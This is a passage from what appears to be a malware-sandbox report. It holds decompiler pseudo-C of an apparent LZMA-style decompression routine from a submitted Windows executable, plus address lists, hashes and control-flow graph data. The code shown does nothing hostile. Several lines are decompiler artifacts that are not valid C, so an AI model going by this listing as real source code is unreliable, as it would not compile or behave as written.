                                                  												L98:
                                                  												 *(__ebp - 0x2c) = __ebx;
                                                  												L119:
                                                  												_t393 = __ebp - 0x2c;
                                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  												__eflags =  *_t393;
                                                  												L120:
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													L166:
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  													goto L170;
                                                  												}
                                                  												L121:
                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                  													goto L171;
                                                  												}
                                                  												L122:
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  												__eax =  *(__ebp - 0x30);
                                                  												_t400 = __ebp - 0x60;
                                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  												__eflags =  *_t400;
                                                  												goto L123;
                                                  											}
                                                  											L95:
                                                  											__ecx = __ebx;
                                                  											__eax = __ebx;
                                                  											__ecx = __ebx >> 1;
                                                  											__eax = __ebx & 0x00000001;
                                                  											__ecx = (__ebx >> 1) - 1;
                                                  											__al = __al | 0x00000002;
                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                  											__eflags = __ebx - 0xe;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ebx >= 0xe) {
                                                  												L97:
                                                  												__ebx = 0;
                                                  												 *(__ebp - 0x48) = __ecx;
                                                  												L102:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													L107:
                                                  													__eax = __eax + __ebx;
                                                  													 *(__ebp - 0x40) = 4;
                                                  													 *(__ebp - 0x2c) = __eax;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                  													__eflags = __eax;
                                                  													L108:
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													 *(__ebp - 0x50) = 1;
                                                  													 *(__ebp - 0x44) = 0;
                                                  													 *(__ebp - 0x48) = 0;
                                                  													L112:
                                                  													__eax =  *(__ebp - 0x40);
                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  														L118:
                                                  														_t391 = __ebp - 0x2c;
                                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  														__eflags =  *_t391;
                                                  														goto L119;
                                                  													}
                                                  													L113:
                                                  													__eax =  *(__ebp - 0x50);
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__esi = __edi + __eax;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__ax =  *__esi;
                                                  													__ecx = __ax & 0x0000ffff;
                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                  														__ecx = 0;
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  														__ecx = 1;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  														__ebx = 1;
                                                  														__ecx =  *(__ebp - 0x48);
                                                  														__ebx = 1 << __cl;
                                                  														__ecx = 1 << __cl;
                                                  														__ebx =  *(__ebp - 0x44);
                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                  														__cx = __ax;
                                                  														__cx = __ax >> 5;
                                                  														__eax = __eax - __ecx;
                                                  														__edi = __edi + 1;
                                                  														__eflags = __edi;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  														 *__esi = __ax;
                                                  														 *(__ebp - 0x50) = __edi;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __edx;
                                                  														0x800 = 0x800 - __ecx;
                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  														 *__esi = __dx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L111:
                                                  														_t368 = __ebp - 0x48;
                                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                                  														__eflags =  *_t368;
                                                  														goto L112;
                                                  													} else {
                                                  														L117:
                                                  														goto L109;
                                                  													}
                                                  												}
                                                  												L103:
                                                  												__ecx =  *(__ebp - 0xc);
                                                  												__ebx = __ebx + __ebx;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													__ebx = __ebx | 0x00000001;
                                                  													__eflags = __ebx;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													L101:
                                                  													_t338 = __ebp - 0x48;
                                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                                  													__eflags =  *_t338;
                                                  													goto L102;
                                                  												} else {
                                                  													L106:
                                                  													goto L99;
                                                  												}
                                                  											}
                                                  											L96:
                                                  											__edx =  *(__ebp - 4);
                                                  											__eax = __eax - __ebx;
                                                  											 *(__ebp - 0x40) = __ecx;
                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  											goto L108;
                                                  										case 0x1a:
                                                  											L56:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												L162:
                                                  												 *(__ebp - 0x88) = 0x1a;
                                                  												goto L170;
                                                  											}
                                                  											L57:
                                                  											__ecx =  *(__ebp - 0x68);
                                                  											__al =  *(__ebp - 0x5c);
                                                  											__edx =  *(__ebp - 8);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  											 *( *(__ebp - 0x68)) = __al;
                                                  											__ecx =  *(__ebp - 0x14);
                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                  											__eax = __ecx + 1;
                                                  											__edx = 0;
                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t192;
                                                  											goto L80;
                                                  										case 0x1b:
                                                  											L76:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												L163:
                                                  												 *(__ebp - 0x88) = 0x1b;
                                                  												goto L170;
                                                  											}
                                                  											L77:
                                                  											__eax =  *(__ebp - 0x14);
                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                  												__eflags = __eax;
                                                  											}
                                                  											__edx =  *(__ebp - 8);
                                                  											__cl =  *(__eax + __edx);
                                                  											__eax =  *(__ebp - 0x14);
                                                  											 *(__ebp - 0x5c) = __cl;
                                                  											 *(__eax + __edx) = __cl;
                                                  											__eax = __eax + 1;
                                                  											__edx = 0;
                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t275;
                                                  											__eax =  *(__ebp - 0x68);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											_t284 = __ebp - 0x64;
                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                  											__eflags =  *_t284;
                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                  											L80:
                                                  											 *(__ebp - 0x14) = __edx;
                                                  											goto L81;
                                                  										case 0x1c:
                                                  											while(1) {
                                                  												L123:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													break;
                                                  												}
                                                  												L124:
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t414 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t414;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  												__eflags =  *(__ebp - 0x30);
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												 *(__ebp - 0x14) = _t414;
                                                  												if( *(__ebp - 0x30) > 0) {
                                                  													continue;
                                                  												} else {
                                                  													L127:
                                                  													L81:
                                                  													 *(__ebp - 0x88) = 2;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											L167:
                                                  											 *(__ebp - 0x88) = 0x1c;
                                                  											goto L170;
                                                  									}
                                                  								}
                                                  								L171:
                                                  								_t539 = _t538 | 0xffffffff;
                                                  								goto L172;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}















                                                  0x00407420
                                                  0x004075cf
                                                  0x004075cf
                                                  0x00000000
                                                  0x004075cf
                                                  0x00407426
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00407441
                                                  0x00407441
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x00000000
                                                  0x00406dec
                                                  0x00406d66
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x00000000
                                                  0x00407137
                                                  0x00407122
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                  • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                  • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                  • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 768 4074f0-407505 763->768 769 407507-40751a 763->769 764->759 767 4075e5-4075f8 765->767 771 406bf2 766->771 772 4075fa 766->772 774 4075fd-407601 767->774 773 40751d-407524 768->773 769->773 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->767 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->767 791 406cc4-406cc8 785->791 786->767 787->779 788->767 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                                                  C-Code - Quality: 98%
                                                  			E00407395() {
                                                  				void _t533;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				signed int* _t605;
                                                  				void* _t612;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t612 - 0x40) != 0) {
                                                  						 *(_t612 - 0x84) = 0x13;
                                                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                  						goto L132;
                                                  					} else {
                                                  						__eax =  *(__ebp - 0x4c);
                                                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  						__ecx =  *(__ebp - 0x58);
                                                  						__eax =  *(__ebp - 0x4c) << 4;
                                                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  						L130:
                                                  						 *(__ebp - 0x58) = __eax;
                                                  						 *(__ebp - 0x40) = 3;
                                                  						L144:
                                                  						 *(__ebp - 0x7c) = 0x14;
                                                  						L145:
                                                  						__eax =  *(__ebp - 0x40);
                                                  						 *(__ebp - 0x50) = 1;
                                                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  						L149:
                                                  						if( *(__ebp - 0x48) <= 0) {
                                                  							__ecx =  *(__ebp - 0x40);
                                                  							__ebx =  *(__ebp - 0x50);
                                                  							0 = 1;
                                                  							__eax = 1 << __cl;
                                                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  							__eax =  *(__ebp - 0x7c);
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							while(1) {
                                                  								L140:
                                                  								 *(_t612 - 0x88) = _t533;
                                                  								while(1) {
                                                  									L1:
                                                  									_t534 =  *(_t612 - 0x88);
                                                  									if(_t534 > 0x1c) {
                                                  										break;
                                                  									}
                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                  										case 0:
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                  											_t534 =  *( *(_t612 - 0x70));
                                                  											if(_t534 > 0xe1) {
                                                  												goto L171;
                                                  											}
                                                  											_t538 = _t534 & 0x000000ff;
                                                  											_push(0x2d);
                                                  											asm("cdq");
                                                  											_pop(_t569);
                                                  											_push(9);
                                                  											_pop(_t570);
                                                  											_t608 = _t538 / _t569;
                                                  											_t540 = _t538 % _t569 & 0x000000ff;
                                                  											asm("cdq");
                                                  											_t603 = _t540 % _t570 & 0x000000ff;
                                                  											 *(_t612 - 0x3c) = _t603;
                                                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                  												L10:
                                                  												if(_t611 == 0) {
                                                  													L12:
                                                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                  													goto L15;
                                                  												} else {
                                                  													goto L11;
                                                  												}
                                                  												do {
                                                  													L11:
                                                  													_t611 = _t611 - 1;
                                                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                  												} while (_t611 != 0);
                                                  												goto L12;
                                                  											}
                                                  											if( *(_t612 - 4) != 0) {
                                                  												GlobalFree( *(_t612 - 4));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  											 *(_t612 - 4) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                  												goto L10;
                                                  											}
                                                  										case 1:
                                                  											L13:
                                                  											__eflags =  *(_t612 - 0x6c);
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												 *(_t612 - 0x88) = 1;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                  											_t45 = _t612 - 0x48;
                                                  											 *_t45 =  *(_t612 - 0x48) + 1;
                                                  											__eflags =  *_t45;
                                                  											L15:
                                                  											if( *(_t612 - 0x48) < 4) {
                                                  												goto L13;
                                                  											}
                                                  											_t546 =  *(_t612 - 0x40);
                                                  											if(_t546 ==  *(_t612 - 0x74)) {
                                                  												L20:
                                                  												 *(_t612 - 0x48) = 5;
                                                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                  												goto L23;
                                                  											}
                                                  											 *(_t612 - 0x74) = _t546;
                                                  											if( *(_t612 - 8) != 0) {
                                                  												GlobalFree( *(_t612 - 8));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                  											 *(_t612 - 8) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												goto L20;
                                                  											}
                                                  										case 2:
                                                  											L24:
                                                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                  											 *(_t612 - 0x84) = 6;
                                                  											 *(_t612 - 0x4c) = _t553;
                                                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                  											goto L132;
                                                  										case 3:
                                                  											L21:
                                                  											__eflags =  *(_t612 - 0x6c);
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												 *(_t612 - 0x88) = 3;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											_t67 = _t612 - 0x70;
                                                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                  											__eflags =  *_t67;
